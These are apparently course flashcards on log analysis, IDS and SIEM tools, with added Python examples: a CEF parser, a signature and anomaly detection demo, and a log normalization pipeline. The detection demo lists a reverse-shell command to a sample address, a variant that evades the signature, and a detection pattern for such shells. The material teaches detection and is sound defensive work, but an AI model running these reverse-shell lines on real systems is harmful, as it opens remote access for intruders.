Unit 6 - Module 4 - IDS & SIEM Tools Flashcards

1
Q

What is a record of events that occur within an organization’s systems?

A

A Log

2
Q

What is the process of examining logs to identify events of interest?

A

Log Analysis

4
Q

What are the 5 most common log types?

A

1) Network
2) System
3) Application
4) Security
5) Authentication

5
Q

What is the process of collecting, storing, analyzing, and disposing of log data?

A

Log Management

6
Q

What is a set of data that presents two linked items?

ie) a key and its corresponding value: "Alert" : "Malware"

A

Key-Value Pair

7
Q

What is a data type that stores data in a comma-separated list of key-value pairs?

ie) "User":
{
  "id": "1234",
  "name": "user",
  "role": "engineer"
}

A

Object

8
Q

What is a data type that stores data in a comma-separated ordered list?

A

Array

9
Q

What log format uses key-value pairs to structure data and identify fields and their corresponding values?

ie) CEF:Version|Device Vendor|Device Product|Device Version|Signature ID|Name|Severity|Extension

A

Common Event Format (CEF)

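Worked example, added here and not code from the original flashcards or from any CEF vendor: a parser for the CEF header and extension layout shown in card 9. The two sample lines are constructed (the first is written in the style of the CEF specification's classic example), and the header field names used below (device_vendor, signature_id, and so on) are this example's own choice. It handles the escaping that trips people up in practice: `\|` and `\\` inside the seven header fields, and `\=`, `\\`, `\n`, `\r` inside extension values. Pipes in the extension need no escaping, so only the first seven unescaped pipes split the header and everything after them is the extension.

```python
import re

# Names for the seven pipe-delimited header fields (this example's choice of names).
HEADER_FIELDS = ("version", "device_vendor", "device_product", "device_version",
                 "signature_id", "name", "severity")
# Backslash escapes permitted in the header and in extension values, respectively.
HEADER_ESCAPES = {"\\": "\\", "|": "|"}
EXT_ESCAPES = {"\\": "\\", "=": "=", "n": "\n", "r": "\r"}
# An extension key is a run of key characters directly before '=' at the start of
# the extension or after whitespace; an escaped '\=' inside a value never qualifies.
KEY_RE = re.compile(r"(?:^|\s)([A-Za-z0-9_.]+)=")


def _split_unescaped(text, sep, maxsplit):
    """Split on unescaped `sep` at most `maxsplit` times, leaving escapes in place."""
    parts, cur, i = [], [], 0
    while i < len(text):
        c = text[i]
        if c == "\\" and i + 1 < len(text):      # keep the escape pair verbatim
            cur.append(text[i:i + 2])
            i += 2
        elif c == sep and len(parts) < maxsplit:
            parts.append("".join(cur))
            cur = []
            i += 1
        else:
            cur.append(c)
            i += 1
    parts.append("".join(cur))
    return parts


def _unescape(text, table):
    """Resolve the backslash escapes listed in `table`; leave unknown escapes untouched."""
    out, i = [], 0
    while i < len(text):
        if text[i] == "\\" and i + 1 < len(text) and text[i + 1] in table:
            out.append(table[text[i + 1]])
            i += 2
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def parse_extension(ext):
    """Turn 'src=10.0.0.1 dst=2.1.2.2 msg=hello world' into a dict of key-value pairs."""
    fields = {}
    keys = list(KEY_RE.finditer(ext))
    for idx, m in enumerate(keys):
        value_end = keys[idx + 1].start() if idx + 1 < len(keys) else len(ext)
        fields[m.group(1)] = _unescape(ext[m.end():value_end].strip(), EXT_ESCAPES)
    return fields


def parse_cef(line):
    """Parse one CEF line into its header fields plus an 'extension' dict."""
    if not line.startswith("CEF:"):
        raise ValueError("not a CEF line")
    parts = _split_unescaped(line[len("CEF:"):], "|", 7)
    if len(parts) != 8:
        raise ValueError(f"expected 7 header separators, found {len(parts) - 1}")
    event = {k: _unescape(v, HEADER_ESCAPES) for k, v in zip(HEADER_FIELDS, parts[:7])}
    # Severity is usually an integer 0-10; textual severities are kept as written.
    if event["severity"].isdigit():
        event["severity"] = int(event["severity"])
    event["extension"] = parse_extension(parts[7])
    return event


# Constructed samples: the first follows the CEF specification's classic example,
# the second exercises escaped pipes in the header and an escaped '=' in a value.
SAMPLE = (r"CEF:0|Security|threatmanager|1.0|100|worm successfully stopped|10|"
          r"src=10.0.0.1 dst=2.1.2.2 spt=1232 msg=Blocked C:\\temp\\a\=b.exe")
SAMPLE_ESCAPED = r"CEF:0|Vendor\|Inc|prod|1.0|42|Pipe \| in name|5|act=blocked"

if __name__ == "__main__":
    for raw in (SAMPLE, SAMPLE_ESCAPED):
        print(parse_cef(raw))
```

A line with fewer than seven unescaped pipes is rejected rather than guessed at; a SIEM that silently pads such lines ends up with the signature ID in the severity column.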
10
Q

Syslog can refer to which 3 things?

A

Service
Protocol
Log Format

11
Q

What is the collection and transmission of data for analysis?

A

Telemetry

12
Q

What’s an application that monitors activity and alerts on possible intrusions?

A

Intrusion Detection System (IDS)

13
Q

What is any device connected to a network called?

A

Endpoint

14
Q

What is an application that monitors the activity of the host on which it's installed?

A

Host-Based Intrusion Detection System (HIDS)

15
Q

What application collects and monitors network traffic and network data?

A

Network-based intrusion detection system (NIDS)

16
Q

What is the detection method that compares activity against known patterns (signatures) to find events of interest?

A

Signature analysis

17
Q

When monitoring activity, what specifies the rules used by an intrusion detection system (IDS)?

A

A signature

19
Q

What’s an advantage of using signatures?

A

Low rate of false positives - It's very efficient at detecting known threats because it is simply comparing activity to signatures.

20
Q

What are 3 disadvantages of using signatures?

A

They can be evaded - Signatures are unique, and attackers can modify their attack behaviors to bypass the signatures.

Signatures require updates - Signature-based analysis relies on a database of signatures to detect threats, so new threats need new signatures.

Inability to detect unknown threats - Signature-based analysis relies on detecting known threats through signatures.

21
Q

What do you call a pattern that is associated with malicious activity?

A

A Signature

22
Q

What is a detection method that identifies abnormal behavior by comparing activity with a baseline of normal behavior?

A

Anomaly-based Analysis

23
Q

What’s the one advantage of anomaly-based analysis?

A

Ability to detect new and evolving threats.

24
Q

What are two disadvantages of anomaly-based analysis?

A

High rate of false positives - Any behavior that deviates from the baseline can be flagged as abnormal, including behavior that is not malicious.

Pre-existing compromise - The baseline is built from activity assumed to be normal, so if an attacker is already present when the baseline is established, their activity is learned as normal and is not flagged.
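Worked example, added here and not part of the original flashcards: the two detection methods from cards 16 to 24 run over constructed syslog-style log lines. The signature half uses two hypothetical rules (RULE-REVSHELL and RULE-ROOT-BRUTE are this example's own IDs and patterns, not from any real IDS ruleset) and shows both the low false-positive rate and the evasion problem: the same reverse shell with the target split across a shell variable slips past the pattern. The anomaly half builds a per-user baseline of hourly failed SSH logins, flags a burst that exceeds mean + 3 standard deviations, and then shows the pre-existing-compromise problem: when the training window already contains the brute force, the same burst is no longer anomalous. All log lines, hosts and addresses are constructed.

```python
import re
from collections import defaultdict
from statistics import mean, pstdev

# ---- Signature analysis: match activity against known-bad patterns -----------
# Rule IDs and patterns are hypothetical, written for this example only.
SIGNATURES = {
    "RULE-REVSHELL": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "RULE-ROOT-BRUTE": re.compile(r"Failed password for (?:invalid user )?root from"),
}


def signature_scan(lines):
    """Return (rule_id, line) for each line that matches a signature."""
    return [(rule_id, line) for line in lines
            for rule_id, pattern in SIGNATURES.items() if pattern.search(line)]


# ---- Anomaly analysis: compare hourly failed-login volume with a baseline -----
FAILED_RE = re.compile(
    r"^\w{3} +(\d{1,2}) (\d{2}):\d{2}:\d{2} \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(\S+) from")


def failed_logins_per_hour(lines):
    """Count failed SSH logins per (user, day, hour) from syslog-style lines."""
    counts = defaultdict(int)
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            counts[(m.group(3), int(m.group(1)), int(m.group(2)))] += 1
    return counts


def build_baseline(training_lines, buckets):
    """Per-user (mean, stdev) of hourly failure counts over a training window of
    `buckets` (day, hour) slots; slots with no failures count as zero."""
    counts = failed_logins_per_hour(training_lines)
    baseline = {}
    for user in {u for (u, _, _) in counts}:
        observed = [n for (u, _, _), n in counts.items() if u == user]
        observed += [0] * (buckets - len(observed))
        baseline[user] = (mean(observed), pstdev(observed))
    return baseline


def anomaly_scan(baseline, lines, z=3.0, floor=5):
    """Flag (user, day, hour, count, threshold) where count exceeds mean + z*stdev.
    `floor` keeps a user whose baseline is near zero from alerting on one failure."""
    alerts = []
    for (user, day, hour), n in failed_logins_per_hour(lines).items():
        mu, sigma = baseline.get(user, (0.0, 0.0))
        threshold = max(floor, mu + z * sigma)
        if n > threshold:
            alerts.append((user, day, hour, n, round(threshold, 1)))
    return alerts


# ---- Constructed sample data --------------------------------------------------
def failed_login_lines(user, day, hour, n, src="10.0.0.9"):
    return [f"Jan {day:2d} {hour:02d}:00:{i % 60:02d} bastion sshd[{1000 + i}]: "
            f"Failed password for {user} from {src} port {40000 + i} ssh2"
            for i in range(n)]

# Seven quiet training days: alice mistypes her password 0-2 times an hour.
TRAINING = [line for day in range(1, 8) for hour in range(24)
            for line in failed_login_lines("alice", day, hour, (day + hour) % 3)]
# The same window with a brute force already under way on days 5-7.
ATTACK_DURING_TRAINING = [line for day in range(5, 8) for hour in range(24)
                          for line in failed_login_lines("alice", day, hour, 40, "203.0.113.7")]
# Day 8: a 40-attempt burst against alice at 03:00, plus ordinary noise.
DAY8 = (failed_login_lines("alice", 8, 3, 40, "203.0.113.7")
        + failed_login_lines("alice", 8, 5, 3) + failed_login_lines("bob", 8, 4, 2))

# Lines for the signature rules: a textbook reverse shell, the same shell with the
# target moved into a variable so the pattern no longer matches (evasion), and a
# root password guess.
AUDIT_LINES = [
    "Jan  8 03:10:00 bastion audit: cmd=bash -i >& /dev/tcp/203.0.113.7/4444 0>&1",
    "Jan  8 03:11:00 bastion audit: cmd=h=/dev/tcp/203.0.113.7; exec 3<>$h/4444",
    "Jan  8 03:12:00 bastion sshd[77]: Failed password for root from 203.0.113.7 port 5555 ssh2",
]

if __name__ == "__main__":
    print("signature hits:", [r for r, _ in signature_scan(AUDIT_LINES)])
    clean = build_baseline(TRAINING, 7 * 24)
    print("clean baseline alerts:", anomaly_scan(clean, DAY8))
    poisoned = build_baseline(TRAINING + ATTACK_DURING_TRAINING, 7 * 24)
    print("poisoned baseline alerts:", anomaly_scan(poisoned, DAY8))
```

With the clean baseline alice averages one failure an hour, so the day-8 burst of 40 is flagged; with the brute force inside the training window the mean and spread rise far enough that 40 falls under the threshold, which is exactly the pre-existing-compromise disadvantage above.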

26
Q

What is a file used to configure the settings of an application?

A

Configuration File

27
Q

Which tool carries out these 3 steps?

Collect and aggregate data

Normalize data

Analyze data

A

Security Information and Event Management (SIEM) tool

28
Q

Which SIEM tool's query language is Search Processing Language (SPL)?

A

Splunk (SPL is Splunk's query language)

29
Q

What computer language is used in Chronicle to create rules for searching through ingested log data?

A

YARA-L

30
Q

What does Chronicle use to normalize data?

A

The Unified Data Model (UDM)

31
Q

What is a special character that can be substituted with any other character?

A

A wildcard (for example, * matches any run of characters)
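Worked example, added here and not code from the original flashcards or from any SIEM product: the three SIEM steps from card 27 (collect and aggregate, normalize, analyze) as a small pipeline, with the analysis step using the wildcard matching from card 31. It takes lines from two constructed sources, a bastion host's syslog (card 10's log format, with the facility and severity unpacked from the <PRI> value) and a web application's JSON log (card 7's object), maps both onto one common schema, and then searches the normalized fields with shell-style wildcards. The schema field names, the assumed year for syslog timestamps and all hosts, users and addresses are this example's own assumptions; the schema is not Chronicle's UDM and the search is not SPL or YARA-L.

```python
import json
import re
from collections import Counter
from datetime import datetime, timezone
from fnmatch import fnmatchcase

# Syslog (RFC 3164 style) lines carry no year; this example assumes one.
ASSUMED_YEAR = 2024

SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d+)>(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<app>[\w/.-]+)(?:\[\d+\])?: (?P<msg>.*)$")
SSH_RE = re.compile(
    r"(?P<outcome>Accepted|Failed) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+)")


def normalize_syslog(source, line):
    """Map a syslog line onto the common schema, or return None if it is not syslog."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    pri = int(m.group("pri"))                       # PRI = facility * 8 + severity
    ts = datetime.strptime(" ".join(m.group("ts").split()), "%b %d %H:%M:%S")
    event = {
        "ts": ts.replace(year=ASSUMED_YEAR, tzinfo=timezone.utc).isoformat(),
        "source": source, "host": m.group("host"), "app": m.group("app"),
        "facility": pri // 8, "severity": pri % 8,
        "event_type": "syslog_message", "user": None, "src_ip": None, "outcome": None,
        "raw": line,
    }
    ssh = SSH_RE.search(m.group("msg"))
    if ssh:
        event.update(event_type="user_login", user=ssh.group("user"), src_ip=ssh.group("src"),
                     outcome="success" if ssh.group("outcome") == "Accepted" else "failure")
    return event


def normalize_json(source, line):
    """Map a JSON application log record onto the common schema, or None if not JSON."""
    try:
        rec = json.loads(line)
    except ValueError:
        return None
    if not isinstance(rec, dict):
        return None
    raw_ts = rec.get("time")
    ts = datetime.fromisoformat(raw_ts.replace("Z", "+00:00")) if raw_ts else None
    return {
        "ts": ts.astimezone(timezone.utc).isoformat() if ts else None,
        "source": source, "host": rec.get("host"), "app": rec.get("app"),
        "facility": None, "severity": None,
        "event_type": "user_login" if rec.get("event") == "login" else rec.get("event"),
        "user": rec.get("username"), "src_ip": rec.get("client_ip"),
        "outcome": None if "success" not in rec else ("success" if rec["success"] else "failure"),
        "raw": line,
    }


def ingest(raw):
    """Collect (source, line) pairs and normalize each; unparsable lines are kept as 'unknown'."""
    events = []
    for source, line in raw:
        event = normalize_syslog(source, line) or normalize_json(source, line)
        events.append(event or {"ts": None, "source": source, "event_type": "unknown",
                                "user": None, "src_ip": None, "outcome": None, "raw": line})
    return events


def search(events, **patterns):
    """Analyze: keep events whose fields match shell-style wildcards ('*' any run, '?' one char)."""
    return [e for e in events
            if all(fnmatchcase(str(e.get(field, "")), pat) for field, pat in patterns.items())]


def failed_logins_by_source(events):
    """Failed logins per source address across every log source, after normalization."""
    return Counter(e["src_ip"] for e in search(events, event_type="user_login", outcome="failure"))


# Constructed input from two log sources: a bastion host's syslog and a web app's JSON log.
RAW_LINES = [
    ("bastion-syslog", "<38>Jan 10 02:00:01 bastion sshd[1001]: Failed password for admin from 203.0.113.7 port 5000 ssh2"),
    ("webapp-json", '{"time": "2024-01-10T02:00:05Z", "host": "web1", "app": "portal", "event": "login", "username": "admin", "client_ip": "203.0.113.7", "success": false}'),
    ("bastion-syslog", "<38>Jan 10 02:00:09 bastion sshd[1002]: Accepted publickey for alice from 10.0.0.5 port 5001 ssh2"),
    ("bastion-syslog", "not a parseable record"),
]

if __name__ == "__main__":
    events = ingest(RAW_LINES)
    for e in search(events, user="adm*", outcome="failure"):
        print(e["ts"], e["source"], e["src_ip"])
    print(failed_logins_by_source(events))
```

The payoff of the normalize step is the last function: the same attacker address shows up once in syslog and once in JSON, and only after both are mapped to the same src_ip and outcome fields can one search count them together. Unparsable lines are kept with their raw text rather than dropped, so a parser gap does not silently delete evidence.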